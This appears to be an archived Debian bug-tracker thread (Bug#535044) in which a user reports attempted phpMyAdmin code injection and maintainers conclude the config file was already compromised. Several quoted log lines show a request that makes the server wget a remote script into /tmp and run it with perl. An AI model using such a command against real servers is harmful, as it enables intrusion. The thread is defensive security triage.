Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi

On Mon, 29 Jun 2009 14:07:50 +0200, Thijs Kinkhorst wrote:
> Ah right. I don't think there's a way we can realistically do anything about
> an already-compromised installation. That is a general truth for any
> vulnerability: how can we know to what extent the attacker has influenced th

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On Monday 29 June 2009, Michal Čihař wrote:
> No, in the log, he is using an exploited config file (with some custom
> code inside).

Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi

On Mon, 29 Jun 2009 13:39:19 +0200, Thijs Kinkhorst wrote:
> Right, but the reporter is basing his report on the presence of log lines
> trying to exploit the original issue. Which should not be possible anymore.

No, in the log, he is using an exploited config file (with some custom code i

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On Monday 29 June 2009, Michal Čihař wrote:
> > > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
> > > //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&
> > >
> > > It seems PHPMyAdmin shipped with Lenny is still v

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Michal Čihař
Hi

On Mon, 29 Jun 2009 10:58:18 +0200, Thijs Kinkhorst wrote:
> Hi Laurent,
>
> > After looking at my logs, I did notice a lot of attempts to break in
> > phpmyadmin through the following kind of url:
> >
> > 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
> > //phpmyadmin//config.inc.ph

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
Hi Laurent,

> After looking at my logs, I did notice a lot of attempts to break in
> phpmyadmin through the following kind of url:
>
> 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET
> //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Laurent CARON
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole

Hi,

After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url:

82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET //phpm